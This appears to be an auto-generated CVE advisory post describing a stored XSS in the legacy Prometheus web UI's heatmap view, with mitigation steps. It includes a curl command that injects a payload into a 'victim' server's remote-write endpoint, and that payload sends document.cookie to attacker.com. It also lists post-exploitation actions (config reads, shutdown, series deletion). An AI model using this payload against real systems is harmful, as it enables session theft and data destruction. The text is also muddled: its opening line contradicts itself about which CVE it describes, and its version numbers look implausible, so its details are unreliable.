Listen to this Post
How the mentioned CVE works (CVE-2026-40179 – though note describes a similar new XSS; using the provided prior CVE as reference):
The vulnerability resides in the legacy Prometheus web UI, enabled via --enable-feature=old-ui. In the histogram heatmap chart view, the `le` label values are not HTML-escaped before being inserted as axis tick mark labels. An attacker can inject crafted metrics containing malicious JavaScript payloads into the `le` label (e.g., <img src=x onerror=alert(1)>). This injection can occur through a compromised scrape target, the remote write receiver (--web.enable-remote-write-receiver), or the OTLP receiver (--web.enable-otlp-receiver). When a Prometheus administrator or user views the affected heatmap chart, the browser executes the payload. From the XSS context, the attacker can read `/api/v1/status/config` (secrets redacted but config exposed), call `/-/quit` if `–web.enable-lifecycle` is set (shutdown), call `/api/v1/admin/tsdb/delete_series` if `–web.enable-admin-api` is set (data deletion), or exfiltrate metric data. The attack requires the legacy UI to be explicitly enabled.
dailycve form:
Platform: Prometheus
Version: <=0.311.2
Vulnerability: Stored DOM XSS
Severity: Critical
date: 2026-05-05
Prediction: Patch 2026-05-06
What Undercode Say:
Check if legacy UI is enabled
grep --enable-feature=old-ui /etc/default/prometheus
Simulate malicious metric injection via remote write
curl -X POST http://victim:9090/api/v1/write -d 'metric{le="<img src=x onerror=fetch(\"https://attacker.com/?c=\"+document.cookie)>"} 1'
Verify XSS by viewing heatmap at /graph?g0.heatmap=1
Exploit:
Attacker sends crafted metric with payload in `le` label to any ingestion endpoint (scrape, remote write, OTLP). Victim views heatmap → JS executes → reads config, calls shutdown (if lifecycle enabled), deletes series (if admin API enabled), or exfiltrates data via external request.
Protection from this CVE:
- Remove `–enable-feature=old-ui` flag to disable legacy UI.
- Upgrade to Prometheus v0.311.3 or later.
- If legacy UI required, restrict ingestion endpoints to trusted sources, disable `–web.enable-admin-api` and
--web.enable-lifecycle, and avoid untrusted scrape targets. - Use CSP headers to mitigate XSS impact.
Impact:
Complete compromise of Prometheus web UI session. Attacker can leak configuration, shut down server (if lifecycle enabled), delete time series data (if admin API enabled), and exfiltrate all observed metrics. No direct remote code execution, but full administrative control over the Prometheus instance within browser context.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
